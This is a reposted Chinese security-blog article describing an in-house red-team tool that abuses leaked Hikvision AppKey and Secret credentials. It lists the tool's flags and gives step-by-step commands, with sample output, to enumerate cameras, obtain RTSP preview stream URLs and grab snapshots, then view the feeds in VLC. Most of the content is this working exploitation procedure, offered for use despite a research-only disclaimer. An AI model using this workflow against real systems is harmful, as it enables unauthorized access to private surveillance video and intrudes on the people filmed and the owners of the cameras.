Lambda小队内部工具—海康ak泄露利用

admin
admin
admin
140350
文章
117
评论
2024年5月14日21:30:04评论70 views字数 2349阅读7分49秒阅读模式
 

0x00 序

hvv期间经常会从nacos或者js中读取到海康的AppKey和Secret信息,但是苦于没有一个跨平台工具进行漏洞利用和证明,故根据官方文档开发了此工具,工具已放圈子,感兴趣的师傅赶紧加入获取吧。

0x01 Usage
Usage of ./hikvision_go_darwin_amd64:              -api string                    api, 目前支持cameras、preview、picurl              -appkey string                    AppKey              -cameraIndexCode string                    cameraIndexCode              -i string                    目标 . example: http://1.1.1.1              -p int                    端口              -pagesize string                    pagesize (default "100")              -protocol string                    protocol, 根据官方文档给的协议:hik,rtsp,rtmp,hls,ws              -secret string                    Secret
0x02 使用说明

  • step 1 获取监控点资源
./hikvision_go_darwin_amd64 -i 1.1.1.1 -p 443 -appkey xx -secret xx -api cameras{"code":"0","msg":"success","data":{"list":[{"altitude":null,"cameraIndexCode":"561b914765b048caaf1e524939b6e2d9".... 结果已输出至cameras.txt                 
  • step 2 提取结果中的cameraIndexCode
  • step 3 获取监控点预览取流URL(推荐)
./hikvision_go_darwin_amd64 -i 1.1.1.1 -p 443 -appkey xx -secret xx -api preview -cameraIndexCode xx -protocol rtsp{"code":"0","msg":"success","data":{"url":"rtsp://1.1.1.1:554/openUrl/YP6M81y"}}   结果已输出至preview.txt            或 抓取图片            ./hikvision_go_darwin_amd64 -i 1.1.1.1 -p 443 -appkey xx -secret xx -api picurl -cameraIndexCode xx            {"code": "0","msg": "success","data": {"picUrl": "http://1.1.1.1:80/pic?xxx"}}
  • step 4   然后使用VLC或其他工具,就可以查看视频流或图片
0x02 实战利用

API-获取监控点资源

官方文档

https://open.hikvision.com/docs/docId?productId=5c67f1e2f05948198c909700&version=%2F60df74fdc6f24041ac3d2d7f81c32325&https://open.hikvision.com/docs/docId?productId=5c67f1e2f05948198c909700&version=%2F60df74fdc6f24041ac3d2d7f81c32325&tagPath=%E7%BB%BCtagPath=%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0V2.1.0-API%E5%88%97%E8%A1%A8-%E8%A7%86%E9%A2%91%E4%B8%9A%E5%8A%A1-%E8%A7%86%E9%A2%91%E8%B5%84%E6%BA%90#ef459f4b

             Lambda小队内部工具—海康ak泄露利用

API-获取监控点预览取流URL(推荐使用)x0;

官方文档

https://open.hikvision.com/docs/docId?productId=5c67f1e2f05948198c909700&version=%2F60df74fdc6f24041ac3d2d7f81c32325&tagPath=API%E5%88%97%E8%A1%A8-%E8%A7%86%E9%A2%91%E4%B8%9A%E5%8A%A1-%E8%A7%86%E9%A2%91%E5%8A%9F%E8%83%BD

Lambda小队内部工具—海康ak泄露利用

API-抓取图片

官方文档

https://open.hikvision.com/docs/docId?productId=5c67f1e2f05948198c909700&version=%2F60df74fdc6f24041ac3d2d7f81c32325&tagPath=API%E5%88%97%E8%A1%A8-%E8%A7%86%E9%A2%91%E4%B8%9A%E5%8A%A1-%E8%A7%86%E9%A2%91%E5%8A%9F%E8%83%BD#d82bbc55

正常输出应该是如下

{                "code": "0",                "msg": "success",                "data": {                    "picUrl": "http://10.33.47.126:6040/pic?=d4=i535z4165s08d-=64idm*ep=t6p7i=d1s*i7d9i*d2=*9b8d0eaa5-16c2d72-4a555f-88i4e6*e2e28d4"                }            }         

但是实际使用的时候发现会存在如下问题

  • 无返回

Lambda小队内部工具—海康ak泄露利用

  • 设备离线Lambda小队内部工具—海康ak泄露利用

解决办法是需要在web控制台中配置图片资源池,因此实际使用中推荐使用视频流的方式

VLC              Lambda小队内部工具—海康ak泄露利用

原文始发于微信公众号(Lambda小队):Lambda小队内部工具分享—海康ak泄露利用

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日21:30:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Lambda小队内部工具—海康ak泄露利用http://cn-sec.com/archives/2070716.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息